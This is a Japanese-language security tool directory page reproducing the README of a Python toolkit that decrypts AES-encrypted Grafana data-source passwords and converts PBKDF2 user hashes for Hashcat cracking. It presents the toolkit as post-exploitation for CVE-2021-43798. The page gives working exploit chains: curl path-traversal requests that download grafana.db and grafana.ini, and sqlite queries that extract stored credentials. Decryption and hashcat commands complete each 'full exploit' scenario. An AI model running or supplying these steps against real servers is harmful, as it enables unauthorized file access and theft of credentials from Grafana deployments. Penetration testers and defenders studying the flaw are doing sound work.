Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Grafana-Password-Decryptor — GrafanaデータベースからAES-256の復号化とPBKDF2パスワードのクラッキングを行うPythonツールキット。通常は(CVE-2021-43798)と組み合わせて使用されます。 | Kitploit
ツール/GitHubGitHub/strikoder-premium/grafana-password-decryptor
パスワードクラッキング暗号化/復号化ツール脆弱性分析エクスプロイトポストエクスプロイト暗号化
GitHubstrikoder-premium/grafana-password-decryptor

Grafana-Password-Decryptor

GrafanaデータベースからAES-256の復号化とPBKDF2パスワードのクラッキングを行うPythonツールキット。通常は(CVE-2021-43798)と組み合わせて使用されます。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
18ヶ月前未レビュー

Grafana パスワード復号ツール

Grafana のパスワードを複数の形式から復号・クラッキングするための Python ツールキットです。

作成: strikoder

このツールの機能

Grafana のパスワード保存形式は 2 種類 に対応しています:

  • 🔐 AES-256 Base64(data_source テーブル) → AESDecrypt.py で直接復号
  • 🔨 PBKDF2_HMAC_SHA256(user テーブル) → grafana2hashcat.py で Hashcat 用に変換

CVE-2021-43798 のパストラバーサル後のポストエクスプロイテーションに最適です。

CVE-2021-43798 とは

Grafana バージョン 8.0.0-beta1 から 8.3.0 に存在するパストラバーサル脆弱性で、認証されていない攻撃者 がサーバー上の任意のファイルを読み取ることができます。対象となるファイルは次のとおりです:

  • 設定ファイル(/etc/grafana/grafana.ini)
  • データベースファイル(/var/lib/grafana/grafana.db)
  • システムファイル(/etc/passwd)

エクスプロイト例:

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is --output grafana.db

このツールキットは、データベースから抽出したパスワードを 復号・クラッキング することで攻撃チェーンを完成させます。

同梱ツール

1. AESDecrypt.py

data_source テーブルに保存された AES-256 暗号化パスワードを復号します。

ベース: jas502n/Grafana-CVE-2021-43798 に以下の主要な改良を加えています:

  • ✅ 柔軟なシークレットキー: キーを手動で抽出(ハードコードされたパスなし)
  • ✅ バッチ処理: ファイルから複数のハッシュを復号
  • ✅ 完全設定可能: すべてのパラメータを CLI フラグで指定

2. grafana2hashcat.py

user テーブルの Grafana の PBKDF2_HMAC_SHA256 ハッシュを、パスワードクラッキング用に Hashcat 互換形式へ変換します。

クレジット: iamaldi/grafana2hashcat

インストール

root@kitploit:~
git clone https://github.com/strikoder/Grafana-Password-Decryptor.git
cd Grafana-Password-Decryptor
pip install cryptography #for Decyrption
chmod +x AESDecrypt.py grafana2hashcat.py

使い方

ツール 1: AESDecrypt.py(AES-256 Base64 パスワード用)

単一ハッシュの復号

root@kitploit:~
python3 AESDecrypt.py -hash R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

複数ハッシュの復号

root@kitploit:~
python3 AESDecrypt.py -f hashes.txt

カスタムシークレットキーの使用

Grafana 設定からシークレットキーを抽出します:

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' --path-as-is | grep secret_key

python3 AESDecrypt.py -hash [HASH] -k YOUR_SECRET_KEY

ツール 2: grafana2hashcat.py(PBKDF2 ハッシュ用)

単一ハッシュファイルの変換

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt

入力形式(grafana_hashes.txt):

root@kitploit:~
hash1,salt1
hash2,salt2
hash3,salt3

出力(Hashcat で使用可能):

root@kitploit:~
sha256:10000:base64_salt:base64_hash

ファイルへの保存

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

Hashcat でクラック

root@kitploit:~
hashcat -m 10900 hashcat_hashes.txt wordlist.txt

完全なエクスプロイト例

シナリオ 1: AES 暗号化パスワード(data_source テーブル)

root@kitploit:~
# 1. Extract secret key from grafana.ini (might be empty in some cases, use default key in python program in that case)
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' \
  --path-as-is | grep secret_key

# 2. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 3. Extract AES-encrypted passwords from data_source table
sqlite3 grafana.db "SELECT name, password FROM data_source;"

# 4. Save passwords to file (one per line)
# Example: R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

# 5. Decrypt with extracted secret key
python3 AESDecrypt.py -f passwords.txt -k [SECRET_KEY]

シナリオ 2: PBKDF2 ハッシュ(user テーブル)

root@kitploit:~
# 0. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 1. Extract PBKDF2 password hashes from user table
sqlite3 grafana.db "SELECT login, password, salt FROM user;"

# 2. Format hashes for grafana2hashcat (hash,salt format)
# Example format in grafana_hashes.txt:
# 3ad31dc57a7452c442f259cfff7aa61f2a6cea88ee634724ae146e221ae4e01c56c8bcbb3552310acd2fd746a396d2f99bf8,pepper

# 3. Convert to Hashcat format
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

# 4. Crack with Hashcat (mode 10900 = PBKDF2-HMAC-SHA256)
hashcat -m 10900 hashcat_hashes.txt rockyou.txt

クイックリファレンス: どのツールを使うべきか?

クレジット

  • AESDecrypt.py: strikoder 作成。jas502n の Go 実装 をベースとしています。
  • grafana2hashcat.py: iamaldi によって作成されました。

⭐ 参考になったなら Star を付けてください!

作成: strikoder

ツールをダウンロード
パスワードの種類データベーステーブル形式ツールHashcat モード
AES-256 暗号化data_sourceBase64 文字列AESDecrypt.py該当なし(直接復号)
PBKDF2_HMAC_SHA256user16進ハッシュ + ソルトgrafana2hashcat.py-m 10900